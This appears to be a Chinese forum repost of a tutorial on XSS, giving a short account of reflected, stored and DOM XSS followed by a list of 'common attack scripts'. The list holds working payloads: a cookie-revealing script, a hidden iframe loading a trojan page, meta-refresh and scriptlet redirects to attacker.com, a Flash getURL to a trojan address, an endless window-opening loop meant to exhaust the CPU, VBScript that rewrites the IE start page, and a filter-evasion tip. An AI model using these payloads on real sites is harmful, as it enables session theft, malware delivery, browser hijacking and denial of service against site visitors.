• 设为首页
  • 收藏本站
  • 积分充值
  • VIP赞助
  • 手机版
  • 微博
  • 微信
    微信公众号 添加方式:
    1:搜索微信号(888888
    2:扫描左侧二维码
  • 快捷导航
    福建二哥 门户 查看主题

    XSS攻击常识及常用脚本

    发布者: 网神之王 | 发布时间: 2025-6-27 16:02| 查看数: 88| 评论数: 0|帖子模式

    一、什么是XSS?
    XSS全称是Cross Site Scripting即跨站脚本,当目标网站目标用户浏览器渲染HTML文档的过程中,出现了不被预期的脚本指令并执行时,XSS就发生了。
    二、XSS分类
    XSS有三类:反射型XSS(非持久型)、存储型XSS(持久型)和DOM XSS
    反射型XSS
    发出请求时,XSS代码出现在URL中,作为输入提交到服务器端,服务器端解析后响应,XSS代码随响应内容一起传回给浏览器,最后浏览器解析执行XSS代码。这个过程像一次反射,故叫反射型XSS。
    存储型XSS
    存储型XSS和反射型XSS的差别仅在于,提交的代码会存储在服务器端(数据库,内存,文件系统等),下次请求目标页面时不用再提交XSS代码
    最典型的例子是留言板XSS,用户提交一条包含XSS代码的留言存储到数据库,目标用户查看留言板时,那些留言的内容会从数据库查询出来并显示,浏览器发现有XSS代码,就当做正常的HTML与Js解析执行,于是触发了XSS攻击。
    DOM XSS
    DOM XSS和反射型XSS、存储型XSS的差别在于DOM XSS的代码并不需要服务器参与,触发XSS靠的是浏览器端的DOM解析,完全是客户端的事情。
    附常见的XSS攻击方法
    1、这个应该都知道
    <script>alert("test")</script> 常用于测试 是否存在跨站
    2、<script>window.alert(document.cookie);</script>
    这句代码将会弹出壹个包含有浏览者cookie信息的对话框,如果用户已经通过帐号登陆网站,在显示的cookie信息中将会包含有用户的账户名和密码。
    3、<script>window.open('http://www.pete.cn /default.asp','newwindow','width=200,height=200');</script>,当用户浏览该 页时,将弹出壹个高爲200,宽爲200的网页窗口,在其中打开的页面是http://www.pete.cn/default.asp
    4、跨站攻击的形式是多样的,不仅可以在网页中插入跨站脚本代码,而且可以在flash文件中插入跨站脚本代码,实现跨站攻击。由于flash文件有较高 的安全性,用户通常对flash文件的警惕性不够,因此用flash文件进行跨站攻击的成功率很高。如果将这个含有跨站脚本代码的flash文件插入到网 页中,例如制作成网页banner或者广告,那么中招的用户将更多。
    flash跨站是通过在flash文件中插入动作脚本来实现的,通过在flash文件“帧”的“动作”中插入跨站脚本代码来实现跨站攻击,其实现方法入下:
    首先运行flash文件制作工具flash8.exe,新建壹个空白的flash文档。然后选中其中的第壹帧,进入界面下方的“动作”编辑界面,在Action Script中插入我们的跨站脚本代码
    getURL("http://网页木马地址", "_blank", "GET");
    loadMovieNum("http://www.pete.cn/test.swf", 0);
    5、<iframe src=http://www.***.com/muma.htm width=0 height=0>< iframe>
    这就是 传说中的框架 - - 膜拜吧 还有JS 也可以使用,比框架更隐蔽
    6、Refresh到另壹个页面:
    1. <meta http-equiv="refresh" content="1;URL=http://www.attacker.com/another.htm">
    复制代码
    7、scriptlet引入另壹个页面:
    1. <object type="text/x-scriptlet" data="http://www.attacker.com/import.htm"></object>
    复制代码
    下面来几段长的 但是 记住 要慎用 !!
    1、打开无数个浏览器窗口,直至CPU超负荷,非关机不可:
    1. <script language="JavaScript">
    2. <!--
    3. while (true)
    4. {
    5. window.open("URI"); //如果URI就是当前页本身,那就更具破坏性。
    6. }
    7. //-->
    8. </script>
    复制代码
    2、 修改注册表(IE 主页):
    1. <script language="VBScript">
    2. Set RegWsh = CreateObject("WScript.Shell")
    3. '设置IE浏览器默认页
    4. RegWsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.attacker.com"
    5. </script>
    复制代码
    有时候,</script> 可以替换大小写 来躲过过滤
    我最后要说的壹句话就是“害人终害己”,切记!
    到此这篇关于XSS攻击常识及常用脚本 的文章就介绍到这了,更多相关XSS 攻击脚本 内容请搜索脚本之家以前的文章或继续浏览下面的相关文章,希望大家以后多多支持脚本之家!

    来源:https://www.jb51.net/hack/39734.html
    免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

    最新评论

    浏览过的版块

    QQ Archiver 手机版 小黑屋 福建二哥 ( 闽ICP备2022004717号|闽公网安备35052402000345号 )

    Powered by Discuz! X3.5 © 2001-2023

    快速回复 返回顶部 返回列表